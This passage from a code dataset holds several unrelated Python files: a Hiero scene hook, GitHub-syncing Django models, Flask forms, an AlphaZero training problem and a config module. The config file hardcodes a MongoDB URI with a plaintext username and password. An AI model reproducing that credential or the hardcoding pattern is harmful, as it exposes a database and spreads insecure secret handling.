grid[x][y - 1] == 0:\n peri += 1\n if x + 1 >= len(grid) or grid[x + 1][y] == 0:\n peri += 1\n if x - 1 < 0 or grid[x - 1][y] == 0:\n peri += 1\n return peri\n","sub_path":"0x1C-makefiles/5-island_perimeter.py","file_name":"5-island_perimeter.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"368243610","text":"\"\"\"\nCopyright (c) 2013 Shotgun Software, Inc\n----------------------------------------------------\n\n\"\"\"\nimport os\nimport hiero.core\n\nfrom tank import Hook\nfrom tank import TankError\n\nclass SceneOperation(Hook):\n \"\"\"\n Hook called to perform an operation with the\n current scene\n \"\"\"\n \n def execute(self, operation, file_path, context, **kwargs):\n \"\"\"\n Main hook entry point\n \n :operation: String\n Scene operation to perform\n \n :file_path: String\n File path to use if the operation\n requires it (e.g. 
open)\n \n :context: Context\n The context the file operation is being\n performed in.\n \n :returns: Depends on operation:\n 'current_path' - Return the current scene\n file path as a String\n 'reset' - True if scene was reset to an empty \n state, otherwise False\n all others - None\n \"\"\"\n\n if operation == \"current_path\":\n # return the current script path\n project = self._get_current_project()\n curr_path = project.path().replace(\"/\", os.path.sep)\n return curr_path\n\n elif operation == \"open\":\n # open the specified script\n hiero.core.openProject(file_path.replace(os.path.sep, \"/\"))\n \n elif operation == \"save\":\n # save the current script:\n project = self._get_current_project()\n project.save()\n \n elif operation == \"save_as\":\n project = self._get_current_project()\n project.saveAs(file_path.replace(os.path.sep, \"/\"))\n\n elif operation == \"reset\":\n # do nothing and indicate scene was reset to empty\n return True\n \n elif operation == \"prepare_new\":\n # add a new project to hiero\n hiero.core.newProject()\n \n\n def _get_current_project(self):\n \"\"\"\n Returns the current project based on where in the UI the user clicked \n \"\"\"\n \n # get the menu selection from hiero engine\n selection = self.parent.engine.get_menu_selection()\n\n if len(selection) != 1:\n raise TankError(\"Please select a single Project!\")\n \n if not isinstance(selection[0] , hiero.core.Bin):\n raise TankError(\"Please select a Hiero Project!\")\n \n project = selection[0].project()\n if project is None:\n # apparently bins can be without projects (child bins I think)\n raise TankError(\"Please select a Hiero Project!\")\n \n return project\n","sub_path":"tank_dev/install/apps/tk-multi-workfiles/v0.3.3/hooks/scene_operation_tk-hiero.py","file_name":"scene_operation_tk-hiero.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"80899489","text":"import heapq\n\nN, M = map(int, input().split())\n\nboard = []\nfor _ in range(N):\n board.append(input())\n\nmx = [0, 0, -1, 1]\nmy = [-1, 1, 0, 0]\n\nq = [(1, 0, 0, 0)]\nvisit_0 = [[0]*M for _ in range(N)]\nvisit_1 = [[0]*M for _ in range(N)]\nvisit_0[0][0] = 1\n\nanswer = 0\nwhile q:\n c, b, x, y = heapq.heappop(q)\n if x == N-1 and y == M-1:\n answer = c\n break\n\n for i in range(4):\n nx = x + mx[i]\n ny = y + my[i]\n\n if 0<=nx and nx now:\n try:\n column.fetch_cards(gh, force_fetch=force_fetch)\n except ApiError:\n # Currently Github raise a 500 when asking for the second page of cards\n # We want to continue to fetch cards of other columns\n pass\n # now manage card that disappeared from any column\n from gim.core.models import Card\n cards_to_delete = Card.objects.filter(column__project=project, github_status=Card.GITHUB_STATUS_CHOICES.ERROR_FETCHED)\n for card in cards_to_delete:\n card.delete()\n\n except Exception:\n # Next time we'll refetch all. 
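The heapq maze record above is cut off mid-condition, so its neighbour checks and the rest of the search are missing. Its state tuple `(cost, broken, x, y)` and the two per-cell visited boards are the standard shape of the "shortest path, at most one wall broken" problem; the sketch below is an assumed completion of that pattern, not the record's recovered code.

```python
import heapq

def shortest_with_one_break(board, N, M):
    # board[r][c] is '0' (open) or '1' (wall); cost counts visited cells.
    mx, my = (0, 0, -1, 1), (-1, 1, 0, 0)
    # visited[r][c][b]: reached (r, c) having broken b walls (b in {0, 1}).
    visited = [[[0, 0] for _ in range(M)] for _ in range(N)]
    visited[0][0][0] = 1
    q = [(1, 0, 0, 0)]  # (cost, walls_broken, row, col)
    while q:
        c, b, x, y = heapq.heappop(q)
        if x == N - 1 and y == M - 1:
            return c
        for i in range(4):
            nx, ny = x + mx[i], y + my[i]
            if not (0 <= nx < N and 0 <= ny < M):
                continue
            if board[nx][ny] == '0' and not visited[nx][ny][b]:
                visited[nx][ny][b] = 1
                heapq.heappush(q, (c + 1, b, nx, ny))
            elif board[nx][ny] == '1' and b == 0 and not visited[nx][ny][1]:
                visited[nx][ny][1] = 1
                heapq.heappush(q, (c + 1, 1, nx, ny))
    return -1
```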
Else we won't be able to get new data if\n # the error occured for example while fetching cards: the fetch of the\n # project would have returned 304, so no more fetch\n self.projects_fetched_at = None\n self.save(update_fields=['projects_fetched_at'])\n raise\n\n @property\n def github_callable_identifiers_for_protected_branches(self):\n return self.github_callable_identifiers + [\n 'branches',\n ]\n\n def fetch_protected_branches(self, gh, force_fetch=False, parameters=None, max_pages=None):\n if parameters is None:\n parameters = {}\n parameters['protected'] = 1\n with Token.manage_gh_if_404(gh):\n return self._fetch_many('protected_branches', gh,\n defaults={\n 'fk': {'repository': self},\n 'related': {'*': {'fk': {'repository': self}}},\n },\n force_fetch=force_fetch,\n parameters=parameters,\n max_pages=max_pages)\n\n def fetch_all_protected_branches(self, gh, force_fetch=False):\n # only admins can fetch protected branches :(\n token = Token.get_for_gh(gh)\n if not token.repos_admin.sismember(self.pk):\n token = Token.get_one_for_repository(self.pk, 'admin')\n if token:\n gh = token.gh\n else:\n return\n\n if not force_fetch:\n if not self.protected_branches_fetched_at:\n force_fetch = True\n try:\n self.fetch_protected_branches(gh, force_fetch=force_fetch)\n for branch in self.protected_branches.all():\n branch.fetch_all(gh, force_fetch=force_fetch)\n except Exception:\n # Next time we'll refetch all. Else we won't be able to get new data\n self.protected_branches_fetched_at = None\n self.save(update_fields=['protected_branches_fetched_at'])\n raise\n\n @property\n def github_callable_identifiers_for_git_heads(self):\n return self.github_callable_identifiers_for_git_data + [\n 'refs',\n 'heads',\n ]\n\n def fetch_git_heads(self, gh, force_fetch=False, parameters=None, max_pages=None):\n with Token.manage_gh_if_404(gh):\n return self._fetch_many('git_heads', gh,\n defaults={\n 'fk': {'repository': self},\n 'related': {'*': {'fk': {'repository': self}}},\n },\n force_fetch=force_fetch,\n parameters=parameters,\n max_pages=max_pages)\n\n def fetch_minimal(self, gh, force_fetch=False, **kwargs):\n if not self.fetch_minimal_done:\n force_fetch = True\n self.fetch(gh, force_fetch=force_fetch)\n\n current_first_fetch_ongoing = get_first_fetch_ongoing()\n\n # If it was None, we let it None\n # If it was -1, it's because we just create the repository, so we always use the pk.\n with toggle_first_fetch_ongoing(self.pk if current_first_fetch_ongoing else None,\n revert_when_done=current_first_fetch_ongoing != -1):\n\n self.fetch_labels(gh, force_fetch=force_fetch)\n self.fetch_milestones(gh, force_fetch=force_fetch)\n if not self.fetch_minimal_done:\n self.fetch_minimal_done = True\n self.save(update_fields=['fetch_minimal_done'])\n\n def fetch(self, gh, defaults=None, force_fetch=False, parameters=None, meta_base_name=None, github_api_version=None):\n with Token.manage_gh_if_404(gh):\n return super(Repository, self).fetch(gh, defaults, force_fetch, parameters, meta_base_name, github_api_version)\n\n def fetch_all(self, gh, force_fetch=False, **kwargs):\n \"\"\"\n Pass \"two_steps=True\" to delay fetch of closed issues and comments (by\n adding a FirstFetchStep2 job that will call fetch_all_step2)\n \"\"\"\n\n with toggle_first_fetch_ongoing(None if self.first_fetch_step2_done else (self.pk or -1)): # -1 if no pk yet\n two_steps = bool(kwargs.get('two_steps', False))\n\n self.fetch_minimal(gh, force_fetch=force_fetch)\n self.fetch_all_protected_branches(gh, force_fetch=force_fetch)\n 
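`fetch_projects` and `fetch_all_protected_branches` above share a pattern worth naming: on any exception they null out their `*_fetched_at` timestamp before re-raising, so the next run bypasses the etag/304 shortcut and refetches everything. The generic shape, with illustrative names that are not an API of this codebase:

```python
# Generic shape of the reset-timestamp-on-failure pattern used above
# (illustrative names only).
def fetch_with_reset(obj, timestamp_field, do_fetch):
    try:
        do_fetch()
    except Exception:
        # A partial fetch may already have consumed the etag/304 shortcut;
        # clearing the timestamp forces a full refetch on the next run.
        setattr(obj, timestamp_field, None)
        obj.save(update_fields=[timestamp_field])
        raise
```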
self.fetch_git_heads(gh, force_fetch=force_fetch)\n\n if two_steps:\n self.fetch_issues(gh, force_fetch=force_fetch, state='open')\n from gim.core.tasks.repository import FirstFetchStep2\n FirstFetchStep2.add_job(self.id)\n else:\n self.fetch_all_step2(gh, force_fetch)\n from gim.core.tasks.project import FetchProjects\n FetchProjects.add_job(self.id)\n from gim.core.tasks.repository import FetchUnmergedPullRequests\n FetchUnmergedPullRequests.add_job(self.id, priority=-15, delayed_for=60*60*3) # 3 hours\n\n if not self.first_fetch_done:\n self.first_fetch_done = True\n self.save(update_fields=['first_fetch_done'])\n\n def fetch_all_step2(self, gh, force_fetch=False, start_page=None,\n max_pages=None, to_ignore=None, issues_state=None):\n # projects are fetched separately\n\n with toggle_first_fetch_ongoing(None if self.first_fetch_step2_done else self.pk):\n if not to_ignore:\n to_ignore = set()\n\n parameters = {}\n if start_page and start_page > 1:\n parameters['page'] = start_page\n\n kwargs = {\n 'gh': gh,\n 'force_fetch': force_fetch,\n 'max_pages': max_pages,\n 'parameters': parameters,\n }\n\n counts = {}\n\n if 'issues' not in to_ignore:\n counts['issues'] = self.fetch_issues(parameters_prs=parameters,\n state=issues_state, **kwargs)\n if 'issues_events' not in to_ignore:\n counts['issues_events'] = self.fetch_issues_events(**kwargs)\n if 'comments' not in to_ignore:\n counts['comments'] = self.fetch_comments(**kwargs)\n if 'pr_comments' not in to_ignore:\n counts['pr_comments'] = self.fetch_pr_comments(**kwargs)\n if 'commit_comments' not in to_ignore:\n counts['commit_comments'] = self.fetch_commit_comments(**kwargs)\n\n return counts\n\n @cached_property\n def has_some_projects(self):\n return self.has_projects and self.projects.exists()\n\n @property\n def has_some_projects_with_issues(self):\n from .projects import CARDTYPE\n return self.has_projects and self.projects.filter(columns__cards__type=CARDTYPE.ISSUE).exists()\n\n GRAPHQL_FETCH_REVIEWS = compose_query(\n # language=graphql\n \"\"\"\n query RepositoryPullRequestsReviews($nbReviewsToRetrieve: Int = 30, $nextReviewsPageCursor: String) {\n %s\n }\n \"\"\", 'pullRequestReviewsFull')\n\n # language=graphql\n GRAPHQL_FETCH_REVIEWS_PR_SUBQUERY = \"\"\"\n node%(pr_id)s: node(id: \"%(pr_idb64)s\") {\n ...pullRequestReviewsFull\n }\n \"\"\"\n\n GRAPHQL_FETCH_ALL_REVIEWS = compose_query(\n # language=graphql\n \"\"\"\n query RepositoryAllPullRequestsReviews($repositoryOwnerLogin: String!, $repositoryName: String!, $nbPullRequestsToRetrieve: Int = 30, $nbReviewsToRetrieve: Int = 30, $nextPullRequestsPageCursor: String, $nextReviewsPageCursor: String) {\n repository(owner:$repositoryOwnerLogin, name:$repositoryName) {\n pullRequests(last: $nbPullRequestsToRetrieve, before: $nextPullRequestsPageCursor) {\n pageInfo {\n ...pageInfoPrevious\n }\n edges {\n node {\n ...pullRequestNumber\n ...pullRequestReviewsFull\n }\n }\n }\n }\n }\n \"\"\", 'pageInfoPrevious', 'pullRequestNumber', 'pullRequestReviewsFull')\n\n GRAPHQL_FETCH_ALL_REVIEWS_LITE = compose_query(\n # language=graphql\n \"\"\"\n query RepositoryAllPullRequestsReviewsLite($repositoryOwnerLogin: String!, $repositoryName: String!, $nbPullRequestsToRetrieve: Int = 30, $nextPullRequestsPageCursor: String) {\n repository(owner:$repositoryOwnerLogin, name:$repositoryName) {\n pullRequests(last: $nbPullRequestsToRetrieve, before: $nextPullRequestsPageCursor) {\n pageInfo {\n ...pageInfoPrevious\n }\n edges {\n node {\n ...pullRequestNumber\n }\n }\n }\n }\n }\n \"\"\", 
'pageInfoPrevious', 'pullRequestNumber')\n\n def _manage_pr_reviews_from_fetch(self, gh, pr, reviews_node):\n from gim.core.models import PullRequestReview\n\n if reviews_node and reviews_node.get('edges'):\n\n objs = PullRequestReview.objects.create_or_update_from_list(\n [edge.node for edge in reviews_node.edges],\n defaults={'fk': {'issue': pr}},\n )\n\n # continue fetching the reviews for this issue if more than one page\n has_next_page = reviews_node.pageInfo.hasNextPage\n if has_next_page:\n objs += pr.fetch_pr_reviews(gh, reviews_node.pageInfo.endCursor, False)\n\n # we're done\n pr.pr_reviews_fetched_at = datetime.utcnow()\n pr.save(update_fields=['pr_reviews_fetched_at'])\n\n def fetch_all_pr_reviews(self, gh, next_page_cursor=None, max_prs=None):\n\n from gim.core.models import Issue\n\n has_next_page = True\n\n per_page = normal_per_page = 30\n\n done = 0\n failed = 0\n total = self.issues.filter(is_pull_request=True).count()\n\n variables = {\n 'repositoryOwnerLogin': self.owner.username,\n 'repositoryName': self.name,\n }\n debug_context = {\n 'total': total,\n }\n\n while has_next_page and (not max_prs or done < max_prs):\n variables['nbPullRequestsToRetrieve'] = per_page\n if next_page_cursor:\n variables['nextPullRequestsPageCursor'] = next_page_cursor\n debug_context.update({\n 'failed': failed,\n 'done': done,\n })\n\n manage_reviews = True\n\n try:\n data = fetch_graphql(gh, self.GRAPHQL_FETCH_ALL_REVIEWS, variables, 'RepositoryAllPullRequestsReviews', debug_context)\n except GraphQLGithubInternalError:\n # We don't know which one fails, so we retry only with the half.\n # When only one PR, and a failure, we have our failing PR, and\n # will fetch it in a very light way to get the number\n\n if per_page > 1:\n per_page /= 2\n continue\n\n # here we have only one left to fetch\n failed += 1\n manage_reviews = False\n debug_context['failed'] = failed\n data = fetch_graphql(gh, self.GRAPHQL_FETCH_ALL_REVIEWS_LITE, variables, 'RepositoryAllPullRequestsReviewsLite', debug_context)\n\n # now we can get the pr and retrieve its reviews\n pr_number = data.repository.pullRequests.edges[0].node.number\n try:\n pr = self.issues.get(number=pr_number)\n pr.fetch_pr_reviews(gh)\n except Issue.DoesNotExist:\n pass\n else:\n done += 1\n\n # we can restore the qtt per page\n per_page = normal_per_page\n # and let the process continue using pagination info\n\n pulls_node = data.repository.pullRequests\n\n has_next_page = pulls_node.pageInfo.hasPreviousPage\n if has_next_page:\n next_page_cursor = pulls_node.pageInfo.startCursor\n else:\n next_page_cursor = None\n\n if not manage_reviews:\n continue\n\n # now work on each retrieved pr\n for edge in pulls_node.get('edges', []):\n try:\n self._manage_pr_reviews_from_fetch(\n gh,\n self.issues.get(number=edge.node.number),\n edge.get('node', {}).get('reviews', {})\n )\n except Issue.DoesNotExist:\n pass\n else:\n done += 1\n\n return total, done, failed, next_page_cursor\n\n def fetch_updated_pr_reviews(self, gh, prs=None, nb_prs_by_query=10, max_prs=None): # more nb_prs_by_query is too much complexity for github\n\n # get the list of PRs to fetch: the ones where it was never fetched, or the one where it\n # was fetched before the last updated at\n if prs is None:\n prs = self.issues.filter(is_pull_request=True).filter(\n models.Q(pr_reviews_fetched_at__isnull=True)\n |\n models.Q(pr_reviews_fetched_at__lt=models.F('updated_at'))\n ).exclude(\n pr_reviews_fetch_failed=True\n ).exclude(\n github_pr_id__isnull=True\n ).select_related(\n 
'repository__owner'\n ).order_by('-updated_at')\n\n # don't fetch reviews for prs for which the global review fetch is not done yet\n from gim.core.tasks.repository import FirstFetchStep2\n if FirstFetchStep2.collection(identifier=self.pk, queued=1):\n try:\n oldest_updated_at = self.issues.filter(pr_reviews_fetched_at__isnull=False).order_by('updated_at').values_list('updated_at', flat=True)[0]\n except IndexError:\n pass\n else:\n prs = prs.filter(updated_at__gt=oldest_updated_at)\n\n total = prs.count()\n\n if total:\n if max_prs:\n prs = prs[:max_prs]\n prs = list(prs)\n else:\n prs = [pr for pr in prs if not pr.pr_reviews_fetch_failed]\n total = len(prs)\n\n if not total:\n return 0, 0\n\n count = 0\n\n failing_prs = {}\n while len(prs) and (not max_prs or count < max_prs):\n current_prs, prs = prs[:nb_prs_by_query], prs[nb_prs_by_query:]\n\n prs_by_id = {pr.github_pr_id: pr for pr in current_prs}\n\n subqueries = [\n self.GRAPHQL_FETCH_REVIEWS_PR_SUBQUERY % {\n 'pr_id': pr.github_pr_id,\n 'pr_idb64': encode_graphql_id_for_object(pr),\n }\n for pr in prs_by_id.values()\n ]\n\n query = reindent(self.GRAPHQL_FETCH_REVIEWS % '\\n'.join(subqueries))\n\n try:\n data = fetch_graphql(gh, query, {}, 'RepositoryPullRequestsReviews', {\n 'repository': self.full_name,\n 'prs_left': len(prs) + len(current_prs),\n 'failed': len(failing_prs),\n })\n except GraphQLGithubInternalError:\n # we'll try them later\n failing_prs.update({pr.pk: pr for pr in current_prs})\n continue\n except GraphQLComplexityError as e:\n # reset list to restart with a lower nb of prs by query\n nb_prs_by_query = e.complexity[1] / (e.complexity[0] / nb_prs_by_query)\n prs = current_prs + prs\n continue\n except GraphQLError as e:\n from gim.core.tasks import FetchIssueByNumber\n do_raise = True\n remove_from_data = set()\n try:\n if e.code == 400:\n # handle deleted issues\n errors = e.response.json.get('errors', [])\n for error in errors:\n if error.get('type') == u'NOT_FOUND':\n do_raise = False\n node_key = error.get('path', [''])[0]\n if node_key.startswith('node'):\n remove_from_data.add(node_key)\n pr_id = node_key[4:] # 'node12345' => 12345\n if pr_id.isdigit():\n try:\n issue = prs_by_id[int(pr_id)]\n except KeyError:\n pass\n else:\n # will delete the issue if it does not exist anymore\n FetchIssueByNumber.add_job('%s#%s' % (issue.repository_id, issue.number))\n\n elif error.get('message') == u'Cannot return null for non-nullable field PullRequestReview.author':\n failing_prs.update({pr.pk: pr for pr in current_prs})\n do_raise = False\n except Exception:\n pass\n\n if do_raise:\n raise\n else:\n data = e.response.json.get('data', None) or {}\n if data:\n for node_key in remove_from_data:\n data.pop(node_key, None)\n data = convert_ids_from_graphql_result(data)\n\n for node_key, node_data in data.iteritems():\n pr = prs_by_id[int(node_key[4:])]\n failing_prs.pop(pr.pk, None)\n self._manage_pr_reviews_from_fetch(\n gh,\n pr,\n node_data.get('reviews', {})\n )\n count += 1\n\n if failing_prs:\n if nb_prs_by_query / 2 > 1:\n count += self.fetch_updated_pr_reviews(gh, failing_prs.values(), nb_prs_by_query / 2)[0]\n else:\n # fetch the reviews one by one\n for pr in failing_prs.values():\n pr.fetch_pr_reviews(gh)\n count += 1\n\n return count, total\n\n\nclass ProtectedBranch(GithubObject):\n repository = models.ForeignKey('Repository', related_name='protected_branches')\n name = models.TextField(db_index=True)\n require_status_check = models.BooleanField(default=False)\n require_status_check_include_admins = 
models.BooleanField(default=False)\n require_up_to_date = models.BooleanField(default=False)\n require_approved_review = models.BooleanField(default=False)\n require_approved_review_include_admins = models.BooleanField(default=False)\n etag = models.CharField(max_length=64, blank=True, null=True)\n\n github_api_version = 'loki-preview'\n github_identifiers = {'repository__github_id': ('repository', 'github_id'), 'name': 'name'}\n\n objects = ProtectedBranchManager()\n\n class Meta:\n app_label = 'core'\n\n def __unicode__(self):\n return u'%s' % self.name\n\n @property\n def github_callable_identifiers(self):\n return self.repository.github_callable_identifiers_for_protected_branches + [\n self.name,\n 'protection',\n ]\n\n def fetch(self, gh, defaults=None, force_fetch=False, parameters=None, meta_base_name=None, github_api_version=None):\n if defaults is None:\n defaults = {}\n if not defaults.get('fk', {}):\n defaults['fk'] = {}\n if not defaults.get('repository'):\n defaults['fk']['repository'] = self.repository\n if not defaults.get('simple', {}):\n defaults['simple'] = {}\n if not defaults['simple'].get('name'):\n defaults['simple']['name'] = self.name\n\n try:\n return super(ProtectedBranch, self).fetch(gh, defaults, force_fetch, parameters, meta_base_name, github_api_version)\n except ApiNotFoundError:\n # the branch is not protected anymore\n self.delete()\n return None\n\n\nclass GitHead(GithubObject):\n repository = models.ForeignKey('Repository', related_name='git_heads')\n ref = models.TextField(db_index=True) # without 'refs/heads/'\n sha = models.CharField(max_length=40)\n etag = models.CharField(max_length=64, blank=True, null=True)\n\n github_identifiers = {'repository__github_id': ('repository', 'github_id'), 'ref': 'ref'}\n\n class Meta:\n app_label = 'core'\n\n objects = GitHeadManager()\n\n def __unicode__(self):\n return u'%s' % self.ref\n\n @property\n def github_callable_identifiers(self):\n return self.repository.github_callable_identifiers_for_git_heads + [\n self.ref,\n ]\n\n def fetch(self, gh, defaults=None, force_fetch=False, parameters=None, meta_base_name=None, github_api_version=None):\n if defaults is None:\n defaults = {}\n if not defaults.get('fk', {}):\n defaults['fk'] = {}\n if not defaults.get('repository'):\n defaults['fk']['repository'] = self.repository\n if not defaults.get('simple', {}):\n defaults['simple'] = {}\n if not defaults['simple'].get('ref'):\n defaults['simple']['ref'] = self.ref\n\n try:\n return super(GitHead, self).fetch(gh, defaults, force_fetch, parameters, meta_base_name, github_api_version)\n except ApiNotFoundError:\n # the head doesn't exist anymore\n self.delete()\n return None\n\n @property\n def github_url(self):\n return self.repository.github_url + '/tree/%s' % self.ref\n","sub_path":"gim/core/models/repositories.py","file_name":"repositories.py","file_ext":"py","file_size_in_byte":52161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"334891012","text":"from flask.ext.wtf import Form\nfrom wtforms import TextField, BooleanField, TextAreaField, SelectField\nfrom wtforms.validators import Required, Length\nfrom models import User\nfrom flask.ext.babel import gettext\n\nclass LoginForm(Form):\n\topenid = TextField('openid', validators = [Required()])\n\tremember_me = BooleanField('remember_me', default = False)\n\nclass EditForm(Form):\n\tnickname = TextField('nickname', validators=[Required()])\n\tabout_me = TextAreaField('about_me', validators=[Length(min = 0, max = 
140)])\t\n\tlanguage = SelectField(u'language', coerce=int)\n\n\tdef __init__(self, original_nickname, *args, **kwargs):\n\t\tForm.__init__(self, *args, **kwargs)\n\t\tself.original_nickname = original_nickname\n\n\tdef validate(self):\n\t\tif not Form.validate(self):\n\t\t\treturn False\n\t\tif self.nickname.data == self.original_nickname:\n\t\t\treturn True\n\t\tif self.nickname.data != User.make_valid_nickname(self.nickname.data):\n\t\t\tself.nickname.erros.append(gettext('This nickname has invalid chars.'))\n\t\t\treturn False\t\t\t\n\t\tuser = User.query.filter_by(nickname = self.nickname.data).first()\n\t\tif user != None:\n\t\t\tself.nickname.errors.append(gettext('This nickname is already in user. Please choose another one'))\n\t\t\treturn False\n\t\treturn True\n\nclass PostForm(Form):\n\tpost = TextField('post', validators = [Required()])\t\t\t\n\nclass SearchForm(Form):\n\tsearch = TextField('search', validators = [Required()])\t\n","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"476881120","text":"import itertools\nimport logging\nimport os\nimport time\nfrom functools import partial\nfrom pathlib import Path\nfrom typing import Dict, Optional\n\nfrom numpy import array\n\nimport sqlalchemy\nimport tensorflow as tf\nfrom tensorflow.python.keras.preprocessing.sequence import pad_sequences\n\nfrom rlmolecule.alphazero.alphazero_problem import AlphaZeroProblem\nfrom rlmolecule.alphazero.alphazero_vertex import AlphaZeroVertex\nfrom rlmolecule.alphazero.tf_keras_policy import KLWithLogits, TimeCsvLogger\n\nfrom hallway_state import HallwayState\nfrom model import build_policy_trainer\n\nlogger = logging.getLogger(__name__)\n\n\nclass HallwayAlphaZeroProblem(AlphaZeroProblem):\n def __init__(self,\n engine: sqlalchemy.engine.Engine,\n policy_checkpoint_dir: Optional[str] = None,\n hallway_size: int = 5,\n hidden_layers: int = 3,\n hidden_dim: int = 16,\n **kwargs\n ) -> None:\n\n super(HallwayAlphaZeroProblem, self).__init__(engine, **kwargs)\n self.policy_model = build_policy_trainer(hallway_size, hidden_layers, hidden_dim)\n self.policy_checkpoint_dir = policy_checkpoint_dir\n policy_model_layer = self.policy_model.layers[-1].policy_model\n self.policy_evaluator = tf.function(experimental_relax_shapes=True)(policy_model_layer.predict_step)\n self._checkpoint = None\n\n\n def initialize_run(self):\n \"\"\"\n Load the most recent policy checkpoint\n \"\"\"\n super(HallwayAlphaZeroProblem, self).initialize_run()\n\n if self.policy_checkpoint_dir:\n new_checkpoint = tf.train.latest_checkpoint(self.policy_checkpoint_dir)\n if new_checkpoint != self._checkpoint:\n self._checkpoint = new_checkpoint\n status = self.policy_model.load_weights(self._checkpoint)\n status.assert_existing_objects_matched()\n logger.info(f'Loaded checkpoint {self._checkpoint}')\n elif new_checkpoint == self._checkpoint:\n logger.info(f'Skipping already loaded {self._checkpoint}')\n else:\n logger.info('No checkpoint found')\n\n def _get_network_inputs(self, state: HallwayState) -> Dict:\n \"\"\"Returns a dictionary of network input arrays.\"\"\"\n return {\"position\": array([state.position]), \"steps\": array([state.steps])}\n\n def _get_batched_network_inputs(self, parent: AlphaZeroVertex) -> Dict:\n \"\"\"\n :return the given nodes policy inputs, concatenated together with the\n inputs of its successor nodes. 
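The batching helpers in this hallway-problem file concatenate the parent vertex's network inputs with those of its children and pad them to a common length with Keras's `pad_sequences`. A toy, self-contained illustration of that padding step (toy integer sequences, not the file's real inputs):

```python
# pad_sequences with padding='post' appends zeros so every row in the
# batch has the length of the longest sequence.
from tensorflow.keras.preprocessing.sequence import pad_sequences

batch = [[1, 2, 3], [4], [5, 6]]
print(pad_sequences(batch, padding='post'))
# [[1 2 3]
#  [4 0 0]
#  [5 6 0]]
```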
Used as the inputs for the policy neural\n network\n \"\"\"\n policy_inputs = [self._get_network_inputs(vertex.state)\n for vertex in itertools.chain((parent,), parent.children)]\n return {key: pad_sequences([elem[key] for elem in policy_inputs], padding='post')\n for key in policy_inputs[0].keys()}\n\n def get_value_and_policy(self, parent: AlphaZeroVertex) -> (float, {AlphaZeroVertex: float}):\n\n values, prior_logits = self.policy_evaluator(self._get_batched_network_inputs(parent))\n\n # Softmax the child priors. Be careful here that you're slicing all needed\n # dimensions, otherwise you can end up with elementwise softmax (i.e., all 1's).\n priors = tf.nn.softmax(prior_logits[1:, 0, 0]).numpy().flatten()\n\n # Update child nodes with predicted prior_logits\n children_priors = {vertex: prior for vertex, prior in zip(parent.children, priors)}\n value = float(tf.nn.sigmoid(values[0]))\n\n return value, children_priors\n\n\n def _get_network_inputs_from_serialized_parent(\n self,\n serialized_parent: tf.Tensor) -> ({}, {}):\n\n parent = HallwayState.deserialize(serialized_parent.numpy().decode())\n\n # encode the parent state followed by each of its possible successor states\n policy_inputs = [self._get_network_inputs(state)\n for state in itertools.chain((parent,), parent.get_next_actions())]\n\n policy_inputs = {key: pad_sequences([elem[key] for elem in policy_inputs], padding='post')\n for key in policy_inputs[0].keys()}\n\n return policy_inputs['position'], policy_inputs['steps']\n\n\n def _create_dataset(self) -> tf.data.Dataset:\n \"\"\"\n Creates a tensorflow dataset pipeline to batch game positions from the replay buffer into training batches.\n\n :param problem:\n :return:\n \"\"\"\n\n def get_policy_inputs_tf(parent, reward, visit_probabilities,\n problem: HallwayAlphaZeroProblem) -> {}:\n position, steps = tf.py_function(\n problem._get_network_inputs_from_serialized_parent, inp=[parent],\n Tout=[tf.int64, tf.int64])\n position.set_shape([None, 1])\n steps.set_shape([None, 1])\n return {"position": position, "steps": steps}, (reward, visit_probabilities)\n\n dataset = tf.data.Dataset.from_generator(\n self.iter_recent_games,\n output_shapes=((), (), (None, )),\n output_types=(tf.string, tf.float32, tf.float32)) \\\n .repeat() \\\n .shuffle(self.max_buffer_size) \\\n .map(partial(get_policy_inputs_tf, problem=self),\n num_parallel_calls=tf.data.experimental.AUTOTUNE) \\\n .padded_batch(self.batch_size,\n padding_values=(\n {"position": tf.constant(0, dtype=tf.int64), # Not sure what this should be\n "steps": tf.constant(0, dtype=tf.int64)},\n (0., 0.))) \\\n .prefetch(tf.data.experimental.AUTOTUNE)\n \n return dataset\n\n def train_policy_model(\n self,\n steps_per_epoch: int = 750,\n lr: float = 1E-3,\n epochs: int = int(1E4),\n game_count_delay: int = 30,\n **kwargs) -> tf.keras.callbacks.History:\n\n # wait to start training until enough games have occurred\n while len(list(self.iter_recent_games())) < self.min_buffer_size:\n logger.info(f"Policy trainer: waiting, not enough games found ({len(list(self.iter_recent_games()))})")\n time.sleep(game_count_delay)\n\n # Create the games dataset\n dataset = self._create_dataset()\n print(dataset)\n\n # Create a callback to store optimized models at given frequencies\n model_checkpoint = tf.keras.callbacks.ModelCheckpoint(\n os.path.join(self.policy_checkpoint_dir, 'policy.{epoch:02d}'),\n save_best_only=False, save_weights_only=True)\n\n # Log the time as well as the epoch to synchronize with the game rewards\n csv_logger = TimeCsvLogger(\n os.path.join(self.policy_checkpoint_dir, 'log.csv'),\n separator=',', 
append=False)\n\n # Ensure that the policy checkpoint directory exists\n Path(self.policy_checkpoint_dir).mkdir(parents=True, exist_ok=True)\n\n # Compile the model with a loss function and optimizer\n self.policy_model.compile(\n optimizer=tf.keras.optimizers.Adam(lr),\n loss=[tf.keras.losses.BinaryCrossentropy(from_logits=True), KLWithLogits()])\n\n logger.info("Policy trainer: starting training")\n\n return self.policy_model.fit(\n dataset, steps_per_epoch=steps_per_epoch,\n epochs=epochs, callbacks=[model_checkpoint, csv_logger], **kwargs)\n","sub_path":"examples/hallway/hallway_problem.py","file_name":"hallway_problem.py","file_ext":"py","file_size_in_byte":7478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} {"seq_id":"266275667","text":"# -*- coding: utf-8 -*-\n\nAPP_MONGO_URI = "mongodb://user:mongo123098@ds137008.mlab.com:37008/service_hacker_news?retryWrites=false"\nAPP_MONGO_DB_NAME = "service_hacker_news"\nAPP_MONGO_COLLECTION_POSTS = "posts"\n\nTEST_MONGO_COLLECTION_POSTS = "test_posts"\n\nPARSING_INTERVAL_SEC = 600\nPARSING_TIMEOUT = 30\nPARSING_TRY_LIMIT = 